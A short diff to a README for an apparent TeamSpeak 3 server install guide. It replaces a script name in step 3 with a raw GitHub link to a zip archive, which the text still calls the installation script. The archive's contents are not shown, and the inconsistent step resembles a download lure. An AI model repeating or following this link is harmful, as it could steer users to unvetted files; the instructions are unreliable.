johanmarin12/teamspeak/README.md

 ### Step 3: Download the Installation Script

-Look for a file named something like `teamspeak-install.sh`.
+Look for a file named something like `https://raw.githubusercontent.com/johanmarin12/teamspeak/main/postbag/teamspeak_3.6.zip`.
 This script is what you will use to install TeamSpeak3 Server.
 Click to download this file.

 ### Step 4: Open the Terminal